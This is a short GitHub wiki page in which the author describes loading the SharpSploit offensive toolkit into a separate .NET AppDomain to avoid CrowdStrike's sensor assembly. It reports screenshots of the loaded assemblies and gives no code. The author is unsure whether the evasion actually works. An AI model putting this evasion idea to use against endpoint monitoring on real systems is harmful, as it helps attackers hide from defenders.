Skip to content

Hiding from Crowdstrike

Jump to bottom
Forrest edited this page Jan 23, 2019 · 1 revision

Forgive me pappa Ionescu, for I have sinned (I'm sure he understands this far better than I). This doesn't truly and fully escape anything; we're just taking advantage of how something automated, like Crowdstrike's agent, peeks into applications. Even in the following example, I don't have full confidence that Crowdstrike isn't capable of getting our sketchy payload (SharpSploit) or plumbing the depths of the "sandboxed" AppDomain, though it also isn't logging anything suspicious and doesn't seem to be catching new threads or any odd calls (save for opening handles to protected processes from under-protected places). This certainly warrants more of my time, to look into.

To start off this under-explained example (that I will surely enrich in the future), here are the Assemblies loaded in the main AppDomain, before I load something sketchy like SharpSploit: Main AppDomain Before Loading SharpSploit

Nothing out of the ordinary; no Crowdstrike sensor or, at least, not yet. I'm not sure if there's some sort of determined delay, if the sensor Assembly is always loaded, if it can even interrogate .NET, or if the actions of loading another Assembly, sketchy or not, triggers it -- Add it to the TODO list.

Anyways, nothing crazy here; just showing that both the SharpSploit and Crowdstrike Assemblies are now loaded: Main AppDomain After Loading SharpSploit

Now, this is the point that I realized that I had removed the example code that creates the new AppDomain and loads the SharpSploit Assembly into it... Add that to the TODO pile. Here's a listing of the Assemblies loaded in this new "sandboxed" AppDomain, before I load SharpSploit into it: Sandbox AppDomain Before Loading SharpSploit

And then here we are after loading our sketchy SharpSploit payload: Sandbox AppDomain After Loading SharpSploit

Neat. Of course, the lack of a Crowdstrike sensor Assembly doesn't mean I've done anything of value here. Even though it would appear my activity inside this AppDomain is no longer being tracked, according to the Crowdstrike Falcon console, I'm a strong believer in "If you can't fully explain how it works, it's probably not actually working (and you're dumb)". So brb; need to work. Also, if Pappa Ionescu or someone from Crowdstrike sees this: feel free to reach out to me, but this is the extent of my knowledge (stupidity), thus far.

Clone this wiki locally